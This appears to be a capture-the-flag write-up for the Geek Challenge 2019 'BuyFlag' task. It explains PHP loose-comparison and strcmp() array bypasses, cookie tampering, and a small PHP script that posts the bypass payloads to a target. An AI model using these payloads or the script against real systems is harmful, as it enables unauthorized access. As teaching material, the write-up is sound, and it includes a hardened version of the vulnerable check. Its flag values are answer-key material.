[Geek Challenge 2019]BuyFlag 1 (two solutions)

Challenge environment. The landing page says:

FLAG NEED YOUR 100000000 MONEY

Press F12 and look at the page source. An HTML comment contains the following PHP (the challenge's own code; only the missing semicolon and closing quote have been restored here):

<?php
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number";
    } elseif ($password == 404) {
        echo "Password Right!";
    }
}

PHP code audit:

The form sends two parameters, password and money, by POST.
isset() returns TRUE when the variable exists and is not NULL; an empty string still counts as set.
is_numeric() returns TRUE for integers, floats and numeric strings. A numeric string is one PHP can parse as a number: "404", " 404" (leading whitespace is allowed), "4.04e2" and "1e9" all count, while "404a" does not.
If password is numeric, "password can't be number" is printed.
Otherwise, if password == 404 (a loose comparison), "Password Right!" is printed.

password=404 would satisfy the elseif, but execution never reaches it: 404 is numeric, so the first if fires and rejects it.
To get past is_numeric(), the password has to be a non-numeric string such as 404a, 404b or 404c.
Why does 404a still satisfy $password == 404? Because == is PHP's loose (weak) comparison operator. In PHP 5 and 7, when a string is compared with an integer the string is converted to a number first, and a leading-numeric string like "404a" converts to 404, so the comparison is true.
Caveat: PHP 8 changed this rule. A non-numeric string is now compared with the integer as a string ("404a" == "404" is false), so this trick only works against PHP 7 and earlier.

PHP weak comparison:

Loose comparison (==) in PHP does not require both operands to have the same type; it converts them according to fixed rules and then compares. The rules that matter here (PHP 5/7 behaviour unless noted):

  1. Two booleans, or a boolean/NULL against anything else: both sides are converted to bool and compared (so NULL == false and "0" == false are true).
  2. Two integers or floats: compared numerically.
  3. Two strings: if both are numeric strings they are compared numerically ("1e3" == "1000" is true); otherwise they are compared character by character.
  4. A string against an integer or float: the string is converted to a number first (a leading-numeric string such as "404a" becomes 404, a non-numeric string becomes 0). In PHP 8 a non-numeric string is instead compared as a string against the number cast to string.
  5. Two arrays: equal if they contain the same key/value pairs (order does not matter for ==; === additionally requires the same order and types).
  6. NULL against a string: NULL is converted to "" first. An array against any non-array is never equal.
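An added example (not code from the challenge or from the original write-up) that reproduces the password check from the page source and runs it over a few constructed candidate inputs, so the effect of is_numeric() and the loose comparison can be seen side by side. Run it with `php juggling.php` under PHP 7 and again under PHP 8: under PHP 7 "404a" and "404 " pass both checks, under PHP 8 no string does, because a numeric string is rejected by is_numeric() and a non-numeric string is never == an integer.

```php
<?php
// Added example: the password gate from the challenge's page source, fed with
// constructed candidates. Results differ between PHP 7 and PHP 8 (see lead-in).

function password_check(string $password): string
{
    if (is_numeric($password)) {          // numeric strings are rejected outright
        return "password can't be number";
    } elseif ($password == 404) {         // loose comparison: string against int
        return "Password Right!";
    }
    return "wrong password";
}

// Constructed candidates (assumption: values a tester would plausibly try).
// '404 '  -> trailing space: not numeric in PHP 7, numeric in PHP 8
// '404a'  -> leading-numeric: == 404 in PHP 7, compared as a string in PHP 8
// 'a404'  -> non-numeric, converts to 0 in PHP 7, so never equal to 404
$candidates = ['404', ' 404', '4.04e2', '404 ', '404a', 'a404'];

printf("PHP %s\n", PHP_VERSION);
foreach ($candidates as $p) {
    printf("%-10s is_numeric=%-5s  (%s == 404)=%-5s -> %s\n",
        var_export($p, true),
        var_export(is_numeric($p), true),
        var_export($p, true),
        var_export($p == 404, true),
        password_check($p));
}

// The money check in this challenge relies on the same rules: a numeric string
// compares numerically with an integer, however short the string is.
printf("\nstrlen('1e9') = %d, '1e9' >= 100000000 is %s\n",
    strlen('1e9'), var_export('1e9' >= 100000000, true));
```

The last two lines are the reason the money bypass later in this write-up works: the server sees a three-character string, but the comparison sees one thousand million.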

Send the parameters and capture the request with Burp Suite:
password=404a&money=100000000

Submit the POST from the Firefox extension Max HackBar first and then intercept it, so that the captured request is already a genuine POST. If you take a GET request and only rewrite the method in the intercepted packet, the parameters may still travel in the query string; when converting by hand, the request line, the Content-Type header and the body all have to change (Burp's "Change request method" option does this for you).

Right-click -> Send to Repeater, then press Send to replay the request.

The response says: Only student users can purchase FLAG.
Note the cookie user=0. By convention 0 means false and 1 means true, so we set user=1 to make the back end treat us as a student.

Modify the cookie to user=1 and Send again.

With the user and password checks bypassed, the response becomes:
Nember lenth is too long
(the challenge's own spelling: the number is too long)
Here I thought of using scientific notation to bypass it.
1e9 is a 1 followed by nine zeros, i.e. 1000000000 > 100000000, more than the challenge demands, yet the string is only three characters long.
So the value condition is met and the number is not "too long".

Bypass money with scientific notation:
password=404a&money=1e9

For comparison, money=1 gives:
you have not enough money,loser

Testing the money parameter with different values gives three kinds of output:

  • money=100000000 or anything longer
    • "Nember lenth is too long"
  • money below 100000000 (for example money=1)
    • "you have not enough money,loser"
  • money=1e9 or larger in scientific notation (exponents up to 1e999999 were observed to work), or money passed as an array
    • the flag

I guess the function strcmp() is used to compare the two strings. strcmp(string1, string2) compares the two strings byte by byte (it does not compare their lengths) and returns:

  • 0 if the two strings are equal
  • <0 if string1 is less than string2
  • >0 if string1 is greater than string2

When the input is not validated, passing the parameter as an array (money[]=0) bypasses the check. In PHP 5 and 7, strcmp() given an array emits a warning and returns NULL instead of comparing; NULL == 0 is true under loose comparison, so the "equal" branch runs. PHP 8 throws a TypeError here instead, so this bypass is version-dependent.
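An added example (not code from the challenge or from the original write-up) showing the array bypass against a strcmp()-based check. The check itself is hypothetical and mirrors the guessed back-end below: "equal" wins, "less" loses, anything else is "too long". Run with `php strcmp_array.php`: under PHP 7 the array input prints a warning and still reaches the flag branch; under PHP 8 the same input is caught as a TypeError. A hardened version that rejects non-string input and uses a strict comparison is included for contrast.

```php
<?php
// Added example: why money[]=0 reaches the "equal" branch of a strcmp() check
// in PHP 5/7, and why the same input fails on PHP 8.

// Hypothetical check modelled on the guessed back-end (assumption, not the real source).
function money_check($money, string $target = '100000000'): string
{
    try {
        // PHP 7: array argument -> "expects parameter 1 to be string" warning, returns NULL.
        // PHP 8: array argument -> TypeError.
        $cmp = strcmp($money, $target);
    } catch (TypeError $e) {
        return 'TypeError: ' . $e->getMessage();
    }
    if ($cmp == 0) {                       // loose: NULL == 0 is true
        return 'flag';
    }
    return $cmp < 0 ? 'you have not enough money,loser' : 'Nember lenth is too long';
}

// Hardened version: refuse anything that is not a string, compare strictly.
function money_check_fixed($money, string $target = '100000000'): string
{
    if (!is_string($money)) {
        return 'invalid input';
    }
    $cmp = strcmp($money, $target);
    if ($cmp === 0) {
        return 'flag';
    }
    return $cmp < 0 ? 'you have not enough money,loser' : 'Nember lenth is too long';
}

// Constructed inputs, as PHP would receive them from money=1, money=100000000,
// money=1e9 and money[]=0. Note that strcmp() sorts "1e9" after "100000000"
// ('e' is 0x65, '0' is 0x30), so a pure strcmp() check cannot explain the 1e9 result.
$inputs = ['1', '100000000', '1e9', ['0']];

printf("PHP %s\n", PHP_VERSION);
foreach ($inputs as $money) {
    printf("%-12s  vulnerable: %-32s  fixed: %s\n",
        json_encode($money), money_check($money), money_check_fixed($money));
}
```

The warning PHP 7 prints for the array case ("strcmp() expects parameter 1 to be string, array given") is also what a defender would find in the web server's error log after this kind of probe.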

Here is a bold guess at the back-end source code. It is only a guess: with this exact logic money=1e9 would land in the "too long" branch, because strcmp() compares byte by byte and "1e9" sorts after "100000000", and money=100000000 would return the flag rather than "too long". The observed 1e9 result fits a separate length check followed by a numeric comparison; the array result is what strcmp() explains.

<?php
$flag = 100000000;
$Flag = 'flag{0c531ed2-9c1e-479a-adcb-d975b1376ca6}';  # placeholder value, not the real flag
if (isset($_POST['money'])) {
    # strcmp() casts $flag to the string "100000000"; "==" is the loose comparison, so a NULL result also passes
    if (strcmp($_POST['money'], $flag) == 0)
        echo $Flag;
    elseif (strcmp($_POST['money'], $flag) < 0)
        print 'you have not enough money,loser';
    else
        print 'Nember lenth is too long';
}
?>

Bypass money with an array:
password=404a&money[]=0
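The two working requests from this write-up as a small script instead of HackBar plus Burp Repeater. This is an added example, not part of the original write-up; it assumes the challenge is reachable at the URL given as the first argument (no address is given on this page), that the form fields are password and money and the cookie is user, exactly as observed above, and that PHP's allow_url_fopen is enabled (the default).

```php
<?php
// Added example: send both money bypasses with the Cookie header set to user=1
// and report whether a flag came back. Usage: php buyflag.php http://<challenge-url>

function post(string $url, string $body, string $cookie): string
{
    $ctx = stream_context_create(['http' => [
        'method'        => 'POST',
        'header'        => "Content-Type: application/x-www-form-urlencoded\r\n"
                         . "Cookie: {$cookie}\r\n",
        'content'       => $body,
        'ignore_errors' => true,   // return the body even on a non-2xx status
        'timeout'       => 10,
    ]]);
    $resp = file_get_contents($url, false, $ctx);
    return $resp === false ? '<request failed>' : $resp;
}

// Pull a flag{...} token out of the HTML so the two responses are easy to compare.
function extract_flag(string $html): ?string
{
    return preg_match('/flag\{[0-9a-f-]+\}/i', $html, $m) ? $m[0] : null;
}

$url = $argv[1] ?? null;
if ($url === null) {
    fwrite(STDERR, "usage: php buyflag.php <url>\n");
    exit(1);
}

// Bodies are written by hand: "money[]=0" must stay literal so the server-side
// PHP receives $_POST['money'] as an array.
$payloads = [
    'scientific notation (money=1e9)' => 'password=404a&money=1e9',
    'array (money[]=0)'               => 'password=404a&money[]=0',
];
foreach ($payloads as $name => $body) {
    $html = post($url, $body, 'user=1');   // user=0 returns "Only student users can purchase FLAG"
    printf("%-32s -> %s\n", $name, extract_flag($html) ?? 'no flag in response');
}
```

Because both bypasses depend on PHP 7 semantics (leading-numeric string == int, and strcmp() returning NULL for an array), a target running PHP 8 would answer both requests without a flag.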

Halfway through, the Repeater in my 2023 version of Burp disappeared. I asked the masters here, but I still don't know what happened, so I redid the challenge on the 2021 version of Kali. Painful.

Get flag:
flag{cb3acdc3-dcda-49d0-9597-b7247f9c6ff0}